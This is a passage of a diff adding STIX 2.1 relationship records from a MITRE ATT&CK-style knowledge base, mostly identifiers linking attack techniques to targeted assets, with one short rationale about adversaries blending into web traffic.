"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d20590a-ea68-4703-9e46-e8d59edcfc36", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d303640-7033-4195-ae13-de11bf9d3607", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d394e49-7904-4ba3-a776-17c238ed7774", + "created": "2024-05-23T03:51:16.017Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:06:18.947Z", + "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d4db495-6366-414f-aa58-1dbd97032412", + "created": "2022-04-16T20:45:01.832Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "description": "", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", + "target_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d76274d-75bc-4cd0-be6a-3d5d99f73cb7", + "created": "2023-09-28T20:27:04.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:27:04.841Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d7a9d82-1400-42bd-982a-3e0e4d9396fa", + "created": "2020-01-31T19:01:42.172Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", + "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d7eecfc-4dd6-470c-a604-4c8239ac2be4", + "created": "2023-09-28T21:28:11.821Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:28:11.821Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d836f02-eabd-4294-8dff-ab55dff12ae5", + "created": "2024-06-27T09:15:16.268Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:15:16.268Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d99746d-6c30-49e5-93a2-dce8db8b171a", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d9cff4a-df47-44e6-aec4-eee59a1cfb06", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dac7bd1-8170-420e-9f15-dd2edf2b3613", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dacb856-921d-4a95-a5f5-41f2e2700ced", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dcabc34-bac6-45bf-9856-32073cb7cc5d", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dcf02a1-7b0b-4a70-a455-8054d03864d6", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dcf850c-e0ad-4781-af20-e5bae8f400d8", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4dde0855-5200-4fd8-a235-504af38d1f94", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4df404a6-d23f-4642-95cd-793914d50bae", + "created": "2024-06-27T08:49:00.047Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:49:00.047Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4e09f7c0-3a3e-4ae0-9b5c-8b9776090b70", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4e245643-7bfc-4ad4-870d-b80a5ec8b093", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4e46c6fd-9a4b-4ff7-b032-ad7c3fb6a34a", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4e63f529-079a-465e-b741-4a0f451aa97c", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4e88448c-58f6-404b-b3c0-d52d454d4d60", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4eb445e8-48c5-4f20-af28-b33196be73c8", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ebeacbf-4f30-4f32-86dc-54d932ea7c46", + "created": "2020-03-15T16:27:38.223Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ec1b03b-5bb1-40aa-b4f3-db9fc02f1374", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4eee96be-cc79-43b9-be3d-1880afd72a7e", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f0c4a2b-22fe-49d7-a810-50c003dc685a", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f2ee424-4550-48ac-b995-2cdae87f45f9", + "created": "2020-10-01T01:41:08.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f3a843b-18e7-46e8-8285-9102a2fe62e5", + "created": "2023-09-29T18:02:38.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:02:38.399Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f3e19c8-0f8f-442b-ba3e-f89a445653ef", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f4e2e9e-6f9a-4c9c-af2b-4db4ec444c93", + "created": "2023-09-29T17:57:55.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:57:55.162Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f738fdb-7a0d-45ee-b2bf-c16affbccd36", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f7a0521-aaea-4012-87de-c94b3160288f", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f7cc4b9-fe3a-4883-97cc-4d2a44c55be9", + "created": "2023-09-28T20:09:53.108Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:09:53.108Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f8069f7-8674-4010-8699-7c40fd0a5fc6", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4f8510bf-c058-4cd4-871a-9768c432b74d", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fabd2f2-9dbf-45f6-80fb-86d410de1e6c", + "created": "2019-12-03T12:59:36.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fc63427-7f4c-4024-976f-c3d0ebd84eed", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": 